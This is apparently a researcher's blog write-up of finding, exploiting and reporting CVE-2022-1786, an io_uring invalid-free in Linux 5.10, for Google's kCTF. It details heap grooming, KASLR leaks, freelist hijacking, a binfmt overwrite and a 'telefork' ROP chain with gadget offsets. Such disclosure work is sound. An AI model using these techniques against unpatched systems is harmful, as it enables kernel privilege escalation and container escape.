Introduction
Back in April, I found a 0-day vulnerability in the Linux kernel and exploited it on Google’s kCTF platform.
I reported the bug to Linux kernel security team and helped them fix the vulnerability.
Surprisingly, the reporting process was timely and smooth, which was not expected by me but quite awesome.
Anyway, then I submitted my exploit to kCTF in May. After a pretty long waiting, I got the response in Aug. Apparently, kCTF team liked the exploit and granted me the first full bounty ($91,337) in kCTF’s history (before the bounty raise a few days after I got back the response).
I’m thrilled about the result and really appreciate the recognition of my work!
Thank you, Google!
Then, it was DEF CON, COVID recovery (never regreted attending the DEF CON after-party btw, thank you, perfect r00t and organizers!), and paper deadlines (on that note, stay tuned for some more Linux kernel insanity!). Finally, I have some time to document what happened back then. Hopefully, this blog can inspire more people to join the Linux kernel security community!
Technically, this bug (CVE-2022-1786) is the first bug that I found, analyzed, exploited, and reported alone. This blog is written to commemorate this moment. Thus, this blog will not be in the style of “what is the correct way to exploit the bug”. Instead, it will document all the frustration and excitment in the crazy 7 days that I spent developing the exploit. I hope you will enjoy the ride!
(And thanks to @Zardus for proofreading this blog. Really appreciate it!)
Overview
In this blog, I will first introduce the vulnerability and the primitive it grants. Then, I’ll share what happened in the 7 days it took me to exploit on kCTF’s platform.
@sirdarckat was curious why I spent 5 more days on it after I got it working locally after 2 days. This blog is the answer to the question 🙂
Background
The bug exists in the io_uring
subsystem of the Linux kernel. More specifically, Linux kernel v5.10, because of its unique identity model.
io_uring
is a subsystem in Linux to speed up IO operations.
Traditionally, if we want to do many IO operations in a short time, our program may need to do privilege transitions (through system calls) many times, which is time-consuming (especially with KPTI on because of the constant TLB flushes).
io_uring
is designed to fill the gap. It allows us to submit a series of IO operations (or actions related to IO operations such as timeout) to the kernel directly, and the kernel will perform them in parallel in different task contexts and finish the needed operations rapidly, without privilege transition.
This design allows io_uring
to achieve a much faster IO performance compared with the previous aio
implementation [0], thus it is growing in popularity among developers and experiencing rapid development.
However, rapid development == more bugs. In the last two years, we have seen many severe io_uring bugs that can lead to privilege escalation.
For example, @chompie1337 exploited CVE-2021-41073 and wrote a great writeup [10] on how to exploit io_uring
bugs (which helped me a lot in understanding CVE-2022-1786). @Awarau and @pql performed an insane exploitation against CVE-2022-29582. Their writeup [11] is highly recommended if you want to have a deep understanding on how io_uring
works under the hood.
And I’m aware of a few more such bugs (in io_uring
) exploited and under submission to kCTF.
This blog will only focus on the relevant parts in io_uring
. For a more detailed and more comprehensive understanding on how io_uring
works, please refer to @Awarau and @pql’s blog.
Vulnerability
The bug is about a false assumption on what task the function __io_req_init_async
can be run in.
As you can see in the following vulnerable code:
1 2 3 4 5 6 7 |
static inline void io_req_init_async(struct io_kiocb *req) { struct io_uring_task *tctx = current->io_uring; ... req->work.identity = tctx->identity; ... } |
It assumes the req
(the IO operation request) is submitted by itself (current
), so it assigns its own identity
to the request’s work.
However, this assumption is wrong. If two tasks (threads) try to submit IO requests to the same io_uring at the same time, the two requests may be submitted into one work queue and associated with different request tasks, which is by design and expected.
If one of the threads is trying to exit (for example, by calling execve) when IORING_SETUP_IOPOLL
is enabled, that specific thread will try to reap all the IO events in the work queue (make sure they finish) as shown below.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
static int io_do_iopoll(struct io_ring_ctx *ctx, unsigned int *nr_events, long min) { LIST_HEAD(done); list_for_each_entry_safe(req, tmp, &ctx->iopoll_list, inflight_entry) { ... /* iopoll may have completed current req */ if (READ_ONCE(req->iopoll_completed)) list_move_tail(&req->inflight_entry, &done); } if (!list_empty(&done)) io_iopoll_complete(ctx, nr_events, &done); |
But if IO events are not finished, io_uring
will attempt to reissue the request and try its best to finish the request (the io_iopoll_complete
call above).
However, this time, the new request is initialized (in io_req_init_async
, invoked in a deep call chain from io_iopoll_complete
) in the thread that tries to exit, which may be different from the threads that issued the original requests.
As a result, in io_req_init_async
, current->io_uring
(the exiting thread’s io_uring
context) may not be req->task->io_uring
(the request submitter’s io_uring
context). And a wrong identity
is assigned to req->work.identity
.
Later, when the kernel finishes the IO event and tries to destroy all the io_uring related objects, it will use io_put_identify(req->task->io_uring, req)
for this purpose. Notice this time, it uses the submitter’s io_uring
context (req->task->io_uring
) in io_put_identify
:
1 2 3 4 5 6 7 |
static void io_put_identity(struct io_uring_task *tctx, struct io_kiocb *req) { if (req->work.identity == &tctx->__identity) return; if (refcount_dec_and_test(&req->work.identity->count)) kfree(req->work.identity); } |
Notice that previously, req->work.identity
is assigned to the exiting thread’s identity and here tctx
is the request submitter’s io_uring
context.
Because tctx->identity
is &tctx->__identity
(identity
is a pointer pointing to __identity
, which is the identity struct embeded in struct io_uring_task
), req->work.identity != &tctx->__identity
.
Hence, the kernel thinks req->work.identity
is a heap object and tries to free it while in reality, it is a pointer to the middle of the exiting thread’s struct io_uring_task
as shown below:
1 2 3 4 5 6 7 8 9 10 11 |
struct io_uring_task { /* submission side */ struct xarray xa; struct wait_queue_head wait; struct file *last; struct percpu_counter inflight; struct io_identity __identity; struct io_identity *identity; atomic_t in_idle; bool sqpoll; }; |
In other words, the whole process triggers a type confusion that makes the kernel think req->work.identity
is a heap object and tries to free it while it is a pointer to the middle of a io_uring_task
object.
In other words, it triggers an invalid-free.
Primitive Analysis
Now let’s have a closer look at the involved objects and see what we have here.
The vulnerability’s symptom is an invalid-free in struct io_uring_task
, which is an object in kmalloc-256
. Sounds pretty good, right? (Spoiler: NO! It’s the worst part of the exploit!)
We will free &io_uring_task->__identify
which is at offset 0x90 inside a io_uring_task
object. As shown in the following diagram, an invalid slot will be added to the slab’s freelist.
This sounds easy, we just need to allocate victim objects at the upper/lower slots and use a heap spray object to occupy the invalid slot, then we are done! …Right?…
Well. There is a catch here: in the modern days, the Linux kernel has a new protection called CONFIG_HARDENED_USERCOPY
and it is enabled in most vendor kernels. And ofc, COS (Container-Optimized OS, the kernel used in kCTF and Google Cloud) has it enabled as well. The gist of this protection is that it does not allow copy_from_user
to copy user data across a slot boundary.
In our case, if we use a heap spray object (e.g. msg_msg
) to occupy the invalid slot, the copy_from_user
call will be detected and cause kernel to panic.
I checked all the existing known heap spray objects (back then), and none of them were able to bypass this protection.
Well, technically, one way to bypass this protection is just use a method to spray user data without copy_from_user
. And I knew at least two methods to do it:
- use the
copy_msg
logic inmsg_msg
, where user data are copied into the newmsg_msg
object usingmemcpy
. But this spray method is transient: it will allocate themsg_msg
, write the data, and freemsg_msg
. This can reduce exploit reliability because it does not hold the memory. As an exploit reliability kind of guy (a shameless plug for K(H)eaps here [13]), I detest this method and never tried it. - use
simple_xattr
. Although starlabs published a writeup [12] about it in Jun, I knew about it last year and was considering using it in the exploit because this object also usesmemcpy
to save user data. I didn’t use it because I already had plans for what new techniques to use in this exploit so I didn’t want to burn this technique (kCTF awards more bounty to exploits with new techniques). Thankfully, I didn’t do it. Apparently, valis already used this technique in unrevealed (back then) submissions to kCTF.
With all these constraints, I decided to go for another route: allocate the victim object in the invalid slot and use the upper/lower slots to overwrite the victim object.
And now, the crazy sleepless 7-day started. Brace yourself! The ride is WILD!
Day 1-2: It works locally!!!
After I started analyzing the bug, it took me a few hours to understand most of what I described above.
Freelist Analysis
Then, I investigated how the freelist looks like for further exploitation.
After some time of investigation, it appears that the invalid slot is freed inside the execve
call from the exiting thread and the upper slot (the io_uring_task
itself) is freed in a kernel thread. Since we know execve
is the call that triggers the vulnerability, it makes sense that the freelist looks like: upper_slot => invalid_slot => ...
(lower_slot
is not involved in the vulnerability itself, it is just a random slot that overlaps with invalid_slot
).
Keep the freelist in mind, it proves to be very important later.
Object Selection
Well, our target cache is kmalloc-256
, so let’s think about what interesting objects we can use in this cache.
After some quick examination, I only found three objects in kmalloc-256
that may be interesting for exploitation: struct timerfd_ctx
, struct shmid_kernel
, and struct msg_queue
. After some further investigation, I concluded that only struct timerfd_ctx
can be used for leaking KASLR in kCTF’s kernel. (If the exploit is not run inside a container, shmid_kernel
can do it as well). Considering struct timerfd_ctx
can also be used for obtaining PC-control [1][2], I decided to use it to occupy the invalid slot. I used other objects for heap fengshui.
Heap Fengshui
Now we want to occupy the invalid slot with a struct timerfd_ctx
. Ideally, both the upper/lower slots need to be controlled by us as well. If they are not, when the struct timerfd_ctx
is allocated, we may accidentally overwrite something unexpected and cause a kernel panic. Since the start of the lower slot will be overwritten, the lower slot must be something without “headers” (such as pointers). I chose msg_msgseg
for this purpose.
The details about how msg_msgseg
works can be found in Andy Nguyen’s blog [3]. In short, it is a data structure (almost) full of user data and the content can be read from userspace without freeing the data structure [4]. The only constraint is that the first 8-byte of msg_msgseg
needs to be a pointer. Luckily, it indeed is NULL
when struct timerfd_ctx
overwrites into it.
Now the plan is clear, we can use Heap Grooming to craft a heap layout such that both upper/lower slots are occupied by msg_msgseg
and the invalid slot is occupied by a struct timerfd_ctx
. The heap layout is shown as below:
More specifically, there are typically two types of Heap Grooming stategies. I am not aware of existing names for them, so I’ll call them “digging” and “fencing” grooming stategies. The “digging” stategy is about allocating many payload objects and free one from the middle of them so that we know the freed slot will be surrounded by payload objects. The “fencing” stategy was mostly used back in the days when CONFIG_SLAB_FREELIST_RANDOM
was not enabled. Back then, freshly created slabs had a linear layout, we can allocate a ton of payload objects and free every other payload object so that every freed slot is surrounded payload objects. Basically, the “fencing” stategy creates many “good” freed slots so that it is more resilient to unexpected heap usage from other kernel components.
The approach I took was a combination of “digging” and “fencing”. In the target kernel, each kmalloc-256
slab has 16 slots. What I did was repetitively spraying 16 msg_msgseg
objects (to occupy the whole page) and dig one hole (to ensure one hole in that page), repeating all of that 64 times. Ideally, this will create 64 “good” slots that are surrounded by msg_msgseg
objects, thus increasing resiliency against unexpected heap usage. Then we allocate a struct io_uring_task
in one of the 64 slots, which has a msg_msgseg
as its adjacent object. In other words, by using the grooming, we can ensure the lower slot is a msg_msgseg
object.
Now the question is: how to ensure the upper slot is also something we control?
Well, as we mentioned before, the freelist will be: upper_slot => invalid_slot
. If we try to spray struct timerfd_ctx
, the one in the upper_slot will be corrupted by the one in the invalid slot. And if we try to spray user-controlled objects like msg_msg
, we will get kernel panic when it lands on invalid_slot
(because of CONFIG_HARDENED_USERCOPY
).
So what do we do?
The approach that I took was abusing the fact that those objects are partially overlapped. I will allocate a struct timerfd_ctx
and see whether any msg_msgseg
object’s content gets changed. If yes, we just land a timerfd on the invalid slot and that specific msg_msgseg
is at the lower slot; if not, I’ll free the timer I just allocate and replace it with a msg_msgseg
. This way, we can ensure when the invalid slot is occupied by struct timerfd_ctx
, the upper slot will be a msg_msgseg
.
Info Leak
At this point, we have achieved the desired heap layout: the upper/lower slots are both msg_msgseg
objects and the invalid slot is struct timerfd_ctx
.
With this heap layout, leaking both heap address and KASLR is easy:
Leak Heap Address
there are a few linked list struct embeded in it struct timerfd_ctx
as shown below:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
struct timerfd_ctx { union { struct hrtimer tmr; struct alarm alarm; } t; ktime_t tintv; ktime_t moffs; wait_queue_head_t wqh; u64 ticks; int clockid; short unsigned expired; short unsigned settime_flags; /* to show in fdinfo */ struct rcu_head rcu; struct list_head clist; spinlock_t cancel_lock; bool might_cancel; }; |
When those list struct are empty, they contain pointers pointing back to itself. As a result, we know where the timerfd object is in kernel heap.
Bypass KASLR
Leaking the kernel base to bypass KASLR from a struct timerfd_ctx
has been done before. I learnt from @FizzBuzz101 that if you arm the timer (essentially call timerfd_settime
with CLOCK_REALTIME
on a timerfd) and then its timerfd_ctx->tmr->function
will be set to timerfd_tmrproc()
, which is a kernel .text
pointer.
Let’s ROP!
Now we have all the leaks. And we have two choices of how to proceed the exploit:
- overwrite
timerfd_ctx->tmr.function
, then when the timer is triggered, we will have PC control. - free the timerfd and hijack the freelist in the lower slot.
I first attempted approach 1 and could easily get to ROP. However, the exploit is far from over. The issue here is that this function is called within interrupt contexts, which means, when we get to ROP, the kernel’s execution is not associated with any task. Thus, we can’t directly return back to userspace. Worse still, there is no known way to end the execution gracefully. I tried do_task_dead
to end the execution, but it is not a task
, the kernel will not be happy about killing a non-task and trigger a BUG()
, then crash.
In fact, there are two blogs showing how to tackle this situation in the past [1][2]. However, FuzzBuzz101’s approach will crash the kernel shortly after returning back to userspace (because we are in an interrupt context, which is not supposed to get to userspace), which is not so good. I tried D3v17’s approach as well, but somehow I could not make it work on the target kernel, I would see a message like BUG: scheduling while atomic
and the kernel would crash.
I got stuck here for a bit, then decided to go for approach 2.
Hijacking the slab freelist is possible because when the invalid slot is freed again, its forward pointer (of the freelist) will be stored inside the lower slot. In modern Linux, forward pointers are stored in the middle of objects, in kmalloc-256
, the offset is 0x80. So, the address of the invalid slot’s forward pointer is invalid_slot_addr + 0x80 = upper_slot_addr + 0x90 + 0x80 = upper_slot_addr + 0x110 = lower_slot + 0x10
.
Now let’s continue.
The target kernel has CONFIG_SLAB_FREELIST_HARDENED
enabled, which means the freelist in the kernel will be encoded as follow:
1 2 3 4 5 6 7 8 9 10 |
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr, unsigned long ptr_addr) { #ifdef CONFIG_SLAB_FREELIST_HARDENED return (void *)((unsigned long)ptr ^ s->random ^ swab((unsigned long)(void *)ptr_addr); #else return ptr; #endif } |
kileak demonstrated [5] that if we know ptr_addr
(the address the forward pointer is stored at), ptr
(the forward pointer itself), and the encoded value, then we can calculate s->random
and forge any encoded value and hijack the slab freelist just like before and obtain arbitrary write.
However, in our current setup, we only know ptr_addr
and we have no way to control ptr
itself.
But we can fill up the whole slab then free the timerfd (at the invalid slot). In this way, we force ptr
to be NULL (because it is the only free slot in the slab) and can leak s->random
for hijacking the freelist.
Using the freelist hijacking primitive, we can perform arbitrary write.
binfmt to Privilege Escalation
At this stage, we have all the leaks and arbitrary write primitive. If container escape is not needed, I’ll just overwrite modprobe_path
and get root easily.
But it is and we have to get PC control, then ROP and escape from the container (Well, this was true back then. But @BillyQAQ and I found something interesting a few months afterwards 😛 ).
Anyway, my solution was to overwrite binfmt and then ROP. I have never seen anybody abusing binfmt for kernel exploitation in the past, so I believe it is a new technique (let’s keep a count: novel technique No.1). What I abuse is how Linux kernel loads executables.
The way Linux loads executables is to go through a list of binfmt called formats
[6], and use each binfmt’s load_binary
handler [7] to see whether the the executable is recognizable by any of the format. If the executable is not recognizable by any of the format, it will try to load corresponding kernel modules (thus enables the modprobe_path
exploitation technique). The logic exists in search_binary_handler
as shown below:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
static int search_binary_handler(struct linux_binprm *bprm) { ... read_lock(&binfmt_lock); list_for_each_entry(fmt, &formats, lh) { if (!try_module_get(fmt->module)) continue; read_unlock(&binfmt_lock); retval = fmt->load_binary(bprm); read_lock(&binfmt_lock); put_binfmt(fmt); if (bprm->point_of_no_return || (retval != -ENOEXEC)) { read_unlock(&binfmt_lock); return retval; } } read_unlock(&binfmt_lock); if (need_retry) { ... if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0) return retval; ... } return retval; } |
Most importantly, these binfmt structures are writable!!!
So, what we can do is to use the arbitrary write primitive to overwrite one of the binfmt’s load_binary
callback function and get PC-control (then ROP). My choice was misc_format
because it is after elf_format
in the formats
list. This way, I can get PC-control by trying to execute an invalid executable while at the same time able to execute ELF.
Then we can start ROPing from here and use the normal privilege escalation payload to get root. And indeed, it worked locally.
Me back then:
Easy Peasy. Only took me 2 days to get a working exploit, I’m so good. Let’s get the flaaaaaag on kCTF!!!!
And, nothing happens.
Day 3-4: Panic! Panic! Panic! The Night Falls!
Panic No.1
Yes, after carefully planning everything like a mastermind, and all the effort spent, the kernel didn’t even crash?! What is going on?!
At that point, I had pwned kCTF twice (CVE-2021-4154 and CVE-2022-29581) and had never seen that before. Worse still, I launched a VM on Google Cloud with the same kernel, and the exploit did not even crash my own VM.
So, I started thinking maybe the bug was not triggerable on their platform.
However, after some investigation, I realized that it was because the way I triggered the vulnerability did not work with tmpfs. As I mentioned previously, this bug can be triggered only if IORING_SETUP_IOPOLL
is enabled. But this option can only be enabled if a file can be opened with O_DIRECT
flag [8]. And apparently tmpfs does not support O_DIRECT
. So, the way I triggered the vulnerability, which was to write a huge amount of data to a tmpfs file will not work on kCTF’s environment.
After trying to write the data to a non-tmpfs file, my exploit could crash the VM on Google Cloud. I got super excited: crash == root shell given some more time.
Panic No.2
The reality soon gave me a slap in the face: the only writeable region on kCTF’s platform is tmpfs.
Now how am I supposed to trigger the vulnerability?
I got super frustrated at that moment but I didn’t give up. Rather, I started reading the kernel source code while at the same time thinking about other possible ways to trigger the vulnerability.
Soon, an idea struck me: the root cause of the bug is the kernel trying to re-issue unfinished IO actions when a thread is exiting. The IO actions don’t have to be write actions, they can be long read actions as well (so that they won’t finish before the thread calling exit
).
I wrote a quick proof-of-concept crasher that attempts to read a whole library in one go and then spray msg_msgseg
so that if the vulnerability is triggered, it will crash the kernel by being detected by CONFIG_HARDENED_USERCOPY
. Indeed, it could crash the VM on Google Cloud.
Panic No.3
However, it still could not crash the kernel on kCTF’s platform.
This got me worried. I tried to trigger the vulnerability on many large files (libc and other libraries) manually, but the result was all the same: it could crash the VM on the cloud but not kCTF’s kernel.
After even more investigation, I found out why. The reason is that the access we are given on kCTF is inside a docker container, the base of the file system is overlayfs, which does not support O_DIRECT
(this may not be true, some files could be opened with O_DIRECT
but could not be used to crash the kernel for some unknown reasons).
Then I got mad and basically scanned the whole file system trying to open every readable file with O_DIRECT
flag and I got a handful.
Then I tried to trigger the vulnerability against each file that can be opened with O_DIRECT
, and then BANG! /etc/resolv.conf
crashed the kernel!
(I later told zplin (@Markak_) about this trick and hopefully assisted him in exploiting CVE-2022-20409 (a variant of CVE-2022-1786))
Winning The Race
Now we can trigger the vulnerability on kCTF’s platform by using /etc/resolv.conf
. But there is an issue: this file is too small, just a little bit larger than 100 bytes. As a result, we cannot trigger the vulnerability reliably: we have to race to exit one thread before it finishes reading the file.
But how can we win the race reliably, or at least know when the vulnerability is triggered before all-in on the exploitation?
My answer was to try again and again and side-channel whether the vulnerability is triggered. As shown below:
If the vulnerability is triggered, its freelist forward pointer will be written into the lower slot. Recall that the lower slot is a msg_msgseg
object.
We can basically check all msg_msgseg
object and see whether the content of any of them is changed to infer whether the vulnerability is triggered. By doing this, we can also known which msg_msgseg
is at the lower slot, which is important for later exploitation (for example, hijacking the freelist).
In short, all we need to do is to:
- do heap grooming
- try to trigger the vulnerability using read action (
OP_READ
) - check whether it is triggered using the side-channel
- if triggered, go to step 5, if not, rinse and repeat.
- hijack the freelist and use binfmt for LPE
I wrote another version of the exploit that implements the above logic and enhanced the exploit a lot.
And this version achieved near 100% success rate locally.
Well, have a look at the scrollbar, you don’t think the exploit is done, do you?
Day 5-6: The Dark! The Desperate! The Madness!
I tried to run the exploit on kCTF’s platform multiple times, the exploit somehow consistently crashed at the same place. After many debugging attempts, I figured out that somehow the kernel would crash when the exploit tried to free the timerfd in the invalid slot, which didn’t make any sense. As I mentioned in the “Heap Fengshui” section, the freelist should be upper_slot => invalid_slot
, even if there are some freed slots in between, our search algorithm will handle them gracefully as well (or at least succeed sometimes).
Notice that on kCTF’s platform, if the VM crashes, it will take about 5min for it to reboot. At that moment, it already took me a few hours to figure out where the crash happened. But little did I know, it was just a start.
To make things worse, somehow the platform was experiencing some bugs at that time: the VMs would not reboot after a few crashes. I had to constantly ping @sirdarckat to ask him to help reboot the servers so I could continue remote debugging. Thank you so much @sirdarckat, and sorry for constantly pinging you!
Freelist, What’s Wrong With You?
At this point, I knew there was something wrong with the heap layout, but I couldn’t figure out why. After some more debugging, I knew there was nothing wrong with the lower slot: it was a msg_msgseg
overlapped with the invalid slot. And the output shows the overlapped region indeed belonged to a timerfd.
So, the issue must be on the upper slot.
Then I spent hours staring at my code thinking about situations when the search algorithm might fail consistently. But no luck. I was frustrated, pulling my hair out, and finally decided to go to bed at 3am.
The next morning, I wrote down all the possible states that the upper slot might be in (no matter how ridiculous it might be) when the timerfd is allocated and how to confirm the cases. The notes can be found here.
I tested all the hypothesis one by one. After ruling out the impossible, the one left is the answer, although it doesn’t make sense: somehow, in kCTF’s platform, after the bug is triggered, the freelist is not upper_slot => invalid_slot
, it is invalid_slot => upper_slot
. This doesn’t make any sense because the invalid slot is freed by the execve system call (how we trigger the bug in the first place) and should be freed first no matter what. But it is just not the case on kCTF. To this day, I still don’t know why it is the case, but I blame Kubernetes, for no clear reason (maybe its cgroup
magic makes it prioritize the kernel thread which frees the upper slot?).
Now I knew the root cause of the crash, but to fix it, I needed to be able to debug it. But, my environment is totally different from kCTF’s. To solve the problem, I changed the search algorithm a little bit: I’ll try to allocate timerfd one by one and check whether the content in the msg_msgseg
at the lower slot is changed. Once I get a hit, I’ll spray a lot of msg_msg
as shown below:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
int _search_for_victim() { ... for(int i=0; i<SPRAY_MAX; i++) { // overwrite the invalid slot tfd = timerfd_create(CLOCK_REALTIME, 0); ret = msgrcv(lower_msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY); u64 magic = *(u64 *)&buffer[0x1040]; if(magic == 0xdead4ead00000000) { // mid_tfd = timerfd_create(CLOCK_REALTIME, 0); mid_tfd = tfd; int msgqid = msgqids[i]; // iron out the weird freelist for(int i=0; i<0x10; i++) assert(msgsnd(msgqid, buffer, 0xc1-0x30, IPC_NOWAIT) >= 0); heap_addr = *(u64 *)&buffer[0x1000] - 0x130; printf("mid_tfd: %d, upper_msgqid: %d\n", mid_tfd, upper_msgqid); return 1; } } ... return 0; } |
This way:
- locally, where the freelist is
upper_slot => invalid_slot
, when the invalid slot is taken, the upper slot will be a timerfd as well (corrupted though, but we don’t care as long as we don’t use it) - on kCTF, where the freelist is
invalid_slot => upper_slot
, when the invalid slot is taken by a timerfd, the upper slot will still be empty. The sprayedmsg_msg
will ensure the the slot is taken by us while at the same time not corrupting the timerfd at the invalid slot.
In short, we have the two sitatuations converged (at least for the invalid/lower slots).
Freelist, What’s Wrong With You? Again?!
Now with the heap layout situation figured out, the exploit got a little further. It could leak all the information we want but crash at the arbitrary write to binfmt.
This crash actually makes sense and is expected because the arbitrary write will corrupt the freelist. Let’s assume the freelist initially is A => NULL
. After we hijack the list, it becomes A => binfmt => corrupted_pointer
and there is no way for us to avoid the corrupted pointer because the freelist is encoded and we do not control binfmt. So after the write on binfmt, if the kernel does one more allocation in kmalloc-256
, the kernel will panic.
I tried to make the exploit work by fixing the corrupted freelist. After the write on binfmt, the freelist has only corrupted_pointer
left. We could free A
again so it becomes A => corrupted_pointer
. Then we hijack the freelist again and restore it back to A => NULL
, and voila, no more corrupted freelist. This exploit worked fatasically locally, but yet again, not remotely.
After some more investigation, I concluded that this cache, kmalloc-256
, was heavily used by many components of the kernel, thus the freelist hijacking method just would not work on such as a busy server.
The Dark Before The Dawn
After giving up the freelist hijacking approch. I started playing with the idea of using timerfd_ctx
to ROP.
I had done a decent amount of work on this approach, just needed to find a way to end the ROP chain gracely (as talked about in Let's ROP
section).
Ofc, besides killing the task (do_task_dead
) and returning back to userspace (D3v17’s approach that I failed to replicate), there is one more possibility to end a ROP chain: what if we just let it sleep indefinitely? Basically, ending the ROP chain with a msleep
call (novel technique No.2). However, once the kernel reaches the msleep
call (in interrupt context), it starts spamming warning messages in a busy loop. Initially, I thought the kernel got trapped in an infinite loop and didn’t investigate further.
But somehow, for some reasons that I no longer remember, I discovered that the kernel was actually fine calling msleep
in an interrupt context, the warning messages flooding the console were just warning messages, nothing harmful was done. By using dmesg -n 1
to suppress the messages, I was able to debug again.
With this finding, my plan became:
- use the ROP chain to overwrite binfmt
- end the ROP chain “gracefully” with
msleep
- in userspace, using the overwritten binfmt to ROP in task context and perform LPE
This version, again, worked locally, but not remotely. For some reason, I couldn’t return back to userspace from the ROP chain in binfmt: the kernel would crash when executing the KPTI trampoline [9]. Most weirdly, the crash only happened in kCTF. The exploit worked fine locally.
I tried to copy-paste the payloads that had been proven to be working (basically, all the public kCTF exploits back then). But no luck, all of them resulted in kernel panic when trying to return back to userspace using KPTI trampoline. I even attempted to replicate what Andy Nguyen did in CVE-2021-22555: instead of using KPTI trampoline, I tried carefully not to clobber rbp
in the ROP chain and then resume the execution on the original stack (instead of heap). But still no, the kernel would panic.
At this point, it was already 5am, I knew I was too tired and decided to investigate further the next morning.
Day 7: The Dawn
The next morning, I was very tired and didn’t want to continue the journey.
So, I decided to burn one more novel technique on this exploit: I name it telefork (novel technique No.3).
Fun fact, I came up with this technique when developing the exploit for CVE-2022-29581 for kCTF 😀
Telefork: teleport back to userspace using fork
(The picture is generated using craiyon)
The issue is that we can’t return back to userspace easily (I suspect the issue is the msleep
in interrupt context corrupts something in the current task). Then I decided not to return to the original task context.
The idea of my approach, aka telefork, is simple: instead of trying to handle the CPU privilege ring stuff ourselves, we let the kernel do the work for us by simply calling fork
and then msleep
. The payload that I used is shown as follow:
1 2 3 4 5 |
// return back to userspace rop[idx++] = kaslr_slide + 0xffffffff8107ed20; // fork rop[idx++] = kaslr_slide + 0xffffffff81076990; //: pop rdi; ret; rop[idx++] = 0x1000000; rop[idx++] = kaslr_slide + 0xffffffff81112710; // msleep |
Basically, fork
will extract the userspace return address of the current syscall and assign the value to the newly created task. (This is equivalent to how it works but not exactly how it works, interested readers can look up ret_from_fork
).
After that, the old task will sleep forever because of the msleep
call and the newly created task will directly start execution from the extracted return address in userspace. Since we already finish privilege escalation before calling fork
, the newly created task also has root privilege.
Although there is so much going on in kernel space. The userspace does not observe it, it will think it just returns back from the execve
call (with which we used to trigger the ROP payload in binfmt) with root privilege. It’s like the execution teleports from kernel space back to the userspace.
This time, the exploit worked remotely and helped me got the flag on kCTF’s platform.
Putting It Together
To summarize what I did in the final working exploit, the steps are:
- heap grooming to prepare a heap layout
- race with reading
/etc/resolv.conf
to trigger the vulnerability - use a side-channel in the lower slot (
msg_msgseg
) to indicate whether the vulnerability gets triggered or not - leak KASLR and heap address in the lower slot
- hijack a function pointer in
timerfd_ctx
(in the invalid slot) to ROP - overwrite binfmt and then
msleep
to “gracefully” end the ROP in interrupt contexts - use the overwritten binfmt to launch ROP chain in task context and perform LPE
- return back to userspace using telefork successfully
Android
@chompie1337 pointed out that io_uring was accessible by unprivileged users [10] in Android back in 2021.
Knowing that this bug existed in Android as well, I bought a Pixel 6 immediately and tested it. Unsurprisingly, I crashed the fresh bought Pixel 6 using my poc.
However, when I started preparing for the exploitation by upgrading the phone to the latest version, my poc stopped working. After some further examination, I found out that reason was that io_uring
had been added to the seccomp list in Android. In other words, io_uring
is no longer accessible by unprivileged users (e.g. normal apps) but still accessible by privileged users (e.g. system apps or adb).
At this point, I stopped the journey because of my research work. (I’m sorry HJ, I should’ve worked on your project harder 🙁 )
Conclusion
I found and exploited CVE-2022-1786 on kCTF and won the first full bounty on kCTF in its history. I reported the bug to Linux kernel security team and got the vulnerability patched.
I also discovered that freelist hijacking attack may be unreliable (or even not feasible) if the target cache is too busy. Actually, I’m not 100% convinced by the conclusion myself, that’s why I used “may be”. If anyone finds a technique that can make freelist hijacking attack reliable on busy cache, please let me know, I’d love to learn how to do it.
I will always remember the crazy 7 days that I spent on this exploit. That’s most wild ride that I have ever had with any exploitation.
And I’ll thank myself for keeping all the unfinished exploits untouched so I can recall and document what happened back then after half a year.
Finally, I’d like to thank @sirdarckat for being patient with me and resetting the servers manually for me for a few days, @chris_salls for being the best rubber duck in the world, @Markak_ for encouraging me to try out Android, and all my professors for not firing me (for not doing research work for a whole week straight).
Reference
[0] https://www.phoronix.com/news/Linux-5.6-IO-uring-Tests
[1] https://www.willsroot.io/2020/10/cuctf-2020-hotrod-kernel-writeup.html
[2] https://syst3mfailure.io/hotrod
[3] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
[4] https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html
[5] https://kileak.github.io/ctf/2021/vulncon-ips/
[6] https://elixir.bootlin.com/linux/v5.10.90/source/fs/exec.c#L81
[7] https://elixir.bootlin.com/linux/v5.10.90/source/fs/binfmt_elf.c#L102
[8] https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html
[9] https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/
[10] https://www.graplsecurity.com/post/iou-ring-exploiting-the-linux-kernel
[11] https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
[12] https://www.starlabs.sg/blog/2022/06-io_uring-new-code-new-bugs-and-a-new-exploit-technique/
[13] https://www.usenix.org/conference/usenixsecurity22/presentation/zeng
原文始发于kylebot’s Blog:[CVE-2022-1786] A Journey To The Dawn